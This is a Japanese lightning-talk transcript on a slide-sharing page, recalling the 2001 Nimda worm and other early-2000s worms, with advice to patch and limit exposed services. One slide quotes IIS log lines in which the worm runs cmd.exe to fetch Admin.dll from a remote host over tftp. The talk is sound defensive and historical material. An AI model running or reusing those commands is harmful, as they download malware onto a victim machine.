Upgrade to Pro — share decks privately, control downloads, hide ads and more …

あの頃(2000年頃)のインターネット / The Internet in the early...

Sponsored · Ship Features Fearlessly Turn features on and off without deploys. Used by thousands of Ruby developers.
Avatar for tkito tkito
January 23, 2025
Technology
160
1

あの頃(2000年頃)のインターネット / The Internet in the early 2000s

2025/01/23に開催されたSecurity.any #2 セキュリティあの頃はLTのLT資料です。

Avatar for tkito

tkito

January 23, 2025

More Decks by tkito

See All by tkito
Boot2Rootをやろう / Let's play Boot2Root
Avatar for tkito tkito
0
1.1k
Re: SQLiから始めるRCE生活 / RCE via SQLi
Avatar for tkito tkito
0
350
権限昇格がんばるぞい LinPEAS編 / Privilege escalation using LinPEAS
Avatar for tkito tkito
2
3.7k
Linuxでの権限昇格 / Privilege Escalation in Linux
Avatar for tkito tkito
0
1.1k
SOC-IRとOSCP / SOC-IR and OSCP
Avatar for tkito tkito
0
160

Other Decks in Technology

See All in Technology
先取りMaven4 ~16年ぶりのメジャーアップデート、その進化とは?~
Avatar for 荻原利雄 ogiwarat
0
140
地元にいないローカルオーガナイザーの立ち回り
Avatar for uvb_76 uvb_76
1
450
Diagnosing performance problems without the guesswork
Avatar for Elena Tanasoiu elenatanasoiu
0
150
Oracle AI Database@AWS:サービス概要のご紹介
Avatar for oracle4engineer oracle4engineer
PRO
4
2.8k
トークン数だけでは測れない — Claude Code 組織展開の効果検証から学んだこと
Avatar for Masaki Kubota makikub
0
120
Datadog 認定試験の概要と対策
Avatar for Uechi Shingo uechishingo
0
230
Oracle Cloud Infrastructure IaaS 新機能アップデート 2026/3 - 2026/5
Avatar for oracle4engineer oracle4engineer
PRO
1
160
Mastering Ruby Box
Avatar for Satoshi Tagomori tagomoris
3
140
製造業のクラウド活用最適解〜AI,DXを加速するデータ基盤の作り方〜
Avatar for 濱田孝治 hamadakoji
0
320
Claude Codeを組織で使いこなす— サーバサイドAIエージェント運用の実践知
Avatar for PERSOL CAREER Dev | techtekt techtekt
PRO
0
180
マーケットプレイス版Oracle WebCenter Content For OCI
Avatar for oracle4engineer oracle4engineer
PRO
5
1.8k
Platform engineering for developers, architects & the rest of us (AI agents)
Avatar for danielbryantuk danielbryantuk
0
170

Featured

See All Featured
JAMstack: Web Apps at Ludicrous Speed - All Things Open 2022
Avatar for David Neal reverentgeek
1
460
Organizational Design Perspectives: An Ontology of Organizational Design Elements
Avatar for Dr. Kim W Petersen kimpetersen
PRO
1
720
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
Avatar for Rebecca Miller-Webster rmw
35
3.5k
The Hidden Cost of Media on the Web [PixelPalooza 2025]
Avatar for Tammy Everts tammyeverts
2
320
Improving Core Web Vitals using Speculation Rules API
Avatar for Sergey Chernyshev sergeychernyshev
21
1.5k
コードの90%をAIが書く世界で何が待っているのか / What awaits us in a world where 90% of the code is written by AI
Avatar for r-kagaya rkaga
61
44k
How to make the Groovebox
Avatar for あそなす asonas
2
2.2k
Evolving SEO for Evolving Search Engines
Avatar for Ryan Jones ryanjones
0
210
Bioeconomy Workshop: Dr. Julius Ecuru, Opportunities for a Bioeconomy in West Africa
Avatar for AKADEMIYA2063 akademiya2063
PRO
1
130
Neural Spatial Audio Processing for Sound Field Analysis and Control
Avatar for NII S. Koyama's Lab skoyamalab
0
310
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
Avatar for soudai sone soudai
PRO
200
74k
Helping Users Find Their Own Way: Creating Modern Search Experiences
Avatar for Dan Newman danielanewman
31
3.2k

Transcript

  1. あの頃(2000年頃)のインターネット 2025/01/23 Security.any #02 セキュリティあの頃はLT きとう

  2. 自己紹介 なまえ • きとう、てきとう、tkito • Twitter: @tkito しゅみ • ゲームしたり海に潜ったり徳を積んだり

    2 おしごと • 企業で社内SOCの中の人とかIRとか あの頃(2000年頃)のインターネット

  3. あの頃(2000年頃)のインターネット 3 この先、インターネット老人会的なネタが含まれます

  4. 私とパソコンとインターネット この頃はまだセキュリティ専門ではなかった • 高校生の頃 • Windows 95 • ゲームやったり友達と交流したり •

    ISDN • 大学生の頃① • 自作PCを始める • Windows 98 • Linuxをいじり始める • 大学生の頃② • Windows 2000 • IISでサーバを立てて遊ぶ あの頃(2000年頃)のインターネット 4 この辺から21世紀

  5. 事件発生 2001年9月18日 • IISのサーバログに変なものが あの頃(2000年頃)のインターネット 5

  6. Nimda • 2001年9月に大流行したワーム • IISの脆弱性を突いて感染拡大(複数ある感染経路の一つ) あの頃(2000年頃)のインターネット 6 Insider's Eye:ネットを震撼させたコンピュータ・ワーム、Nimdaを検証する 1.Nimdaの感染原理

    - @IT, https://atmarkit.itmedia.co.jp/fwin2k/insiderseye/20010922nimda/nimda_02.html

  7. 何があった • アクセスログ • 実行されたコマンド • その他 • 特になし…感染までは至ってなかった? あの頃(2000年頃)のインターネット

    7 cmd.exe /c dir cmd.exe /c tftp –I *.*.*.* GET Admin.dll c:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll d:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll e:¥Admin.dll

  8. どうしてこうなった • セキュリティパッチを当ててなかった • 公開の必要がないサーバを公開していた あの頃(2000年頃)のインターネット 8

  9. あの頃のワーム騒ぎ • Code Red • 2001年7月に流行 • IISの脆弱性を突いて感染拡大 • SQL

    Slammer • 2003年1月に流行 • Microsoft SQL Serverの脆弱性を突いて感染拡大 • Blaster • 2003年8月流行 • Microsoft RPCの脆弱性を突いて感染拡大 • Sasser • 2004年4月に流行 • SMBの脆弱性を突いて感染拡大 あの頃(2000年頃)のインターネット 9

  10. 昔の話でしょ? • 果たしてそうかな? あの頃(2000年頃)のインターネット 10

  11. Shodanしてみる あの頃(2000年頃)のインターネット 11 Port 445 (SMB) Port 1433 (SQL Server)

  12. まとめ • あの頃(2000年頃)のワーム騒ぎの紹介 • 今では過去の話…というわけでもなくインターネットに公開状態のものは多い • パッチはちゃんと当てよう • 公開しないでいいものは公開しないようにしよう あの頃(2000年頃)のインターネット

    12

  13. おしまい きとう @tkito 13